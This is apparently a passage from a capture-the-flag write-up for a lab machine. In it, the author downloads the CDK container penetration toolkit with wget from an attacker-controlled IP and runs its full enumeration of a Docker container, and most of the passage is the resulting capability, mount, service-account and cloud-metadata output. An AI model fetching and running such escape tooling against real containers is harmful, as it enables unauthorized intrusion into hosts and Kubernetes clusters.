Mentor_Automated_Docker

CDK - Zero Dependency Container Penetration Toolkit

---

Performing an automated scanning with CDK after making basic enumeration

cdk is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

/root # wget http://10.10.14.11/cdk ; chmod 755 ./cdk
connecting to 10.10.14.11 (10.10.14.11:80)
cdk                    1% |                                |  137k  0:01:24 ETA
cdk                   57% |******************              | 6713k  0:00:01 ETA
cdk                   92% |*****************************   | 10.6m  0:00:00 ETA
cdk                  100% |********************************| 11.4m  0:00:00 ETA

Delivery complete

/root # ./cdk evaluate --full
CDK (Container DucK)
cdk version(gitcommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2023/12/27 17:37:56 current dir: /root
2023/12/27 17:37:56 current user: root uid: 0 gid: 0 home: /root
2023/12/27 17:37:56 hostname: 589113857d68
2023/12/27 17:37:56 alpine alpine 3.10.3 kernel: 5.15.0-56-generic
 
[  Information Gathering - Services  ]
2023/12/27 17:37:56 service found in process:
	1	0	python3
2023/12/27 17:37:56 service found in process:
	7	1	python3
2023/12/27 17:37:56 service found in process:
	8	1	python3
 
[  Information Gathering - Commands and Capabilities  ]
2023/12/27 17:37:56 available commands:
	wget,nc,find,ps,python,python3,vi,mount,fdisk,gcc,base64
2023/12/27 17:37:56 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	capinh:	00000000a00425fb
	capprm:	00000000a00425fb
	capeff:	00000000a00425fb
	capbnd:	00000000a00425fb
	capamb:	0000000000000000
	cap decode: 0x00000000a00425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] maybe you can exploit the capabilities below:
 
[  Information Gathering - Mounts  ]
0:57 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/DRGMD73SWUZIEBTCBZBGE4NVUC:/var/lib/docker/overlay2/l/ZDJFWZPSKIUIDARX3UFVDU45YT:/var/lib/docker/overlay2/l/UP3EQ3NNRGQS5FMQOZ6QOSXVO7:/var/lib/docker/overlay2/l/5Q5RNC7YL4VBLNOE75JSW4YK4Z:/var/lib/docker/overlay2/l/HJMPVSNJR7HDYZI6ZVBJSRWSAV:/var/lib/docker/overlay2/l/7WGNVFAKWVWHP2JEXLJ7CTZZXV:/var/lib/docker/overlay2/l/42TVFU33XU7Y46JFVGK5XO2KDN:/var/lib/docker/overlay2/l/MXUR7B4EKGHIWNQECS2U56RNJM:/var/lib/docker/overlay2/l/KDC34OJY5VUNYMCTPR2I2WADIC:/var/lib/docker/overlay2/l/BE7ULB2VTYRZZGQCJ6LCUZSKRD:/var/lib/docker/overlay2/l/DBCH4DDSQUJOOAAGEI4S3BXA2Y:/var/lib/docker/overlay2/l/HFLYWN53FGIY5IOWOHVWOR7VFY:/var/lib/docker/overlay2/l/JFKXPERB73IRPP466U2SMK2Q2J:/var/lib/docker/overlay2/l/QJEQWOQOZA2WAGRPJOUYCULJZD:/var/lib/docker/overlay2/l/M2RIPVP5DGTFN7GZGZNNXZPJCF:/var/lib/docker/overlay2/l/HMW3VBRCQOA2QCPYKD75GR63PX:/var/lib/docker/overlay2/l/2ZX5PTCMAT344WSU6GC75NALAO,upperdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/diff,workdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/work
0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:61 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:62 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:63 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:59 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:64 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
253:0 /root/scripts/docker/API /API rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /home/svc /home/svc ro,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:60 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:61 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:66 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:67 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2023/12/27 17:37:56 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coredns: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coredns: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2023/12/27 17:37:56 checking if api-server allows system:anonymous request.
err found while searching local k8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load k8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2023/12/27 17:37:57 failed to dial Alibaba Cloud API.
2023/12/27 17:37:58 failed to dial Azure API.
2023/12/27 17:37:59 failed to dial Google Cloud API.
2023/12/27 17:38:00 failed to dial Tencent Cloud API.
2023/12/27 17:38:01 failed to dial OpenStack API.
2023/12/27 17:38:02 failed to dial Amazon Web Services (AWS) API.
2023/12/27 17:38:03 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bash_history - /home/svc/.bash_history
	/.bashrc - /home/svc/.bashrc
 
[  Information Gathering - ASLR  ]
2023/12/27 17:38:04 /proc/sys/kernel/randomize_va_space file content: 2
2023/12/27 17:38:04 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2023/12/27 17:38:04 /proc/1/cgroup file content:
	0::/
2023/12/27 17:38:04 /proc/self/cgroup file added content (compare pid 1) :

As expected, the host system’s /home/svc is mounted to the /home/svc of the current Docker container Additionally, the host system’s /root/scripts/docker/API is mounted to the /API directory of the current Docker container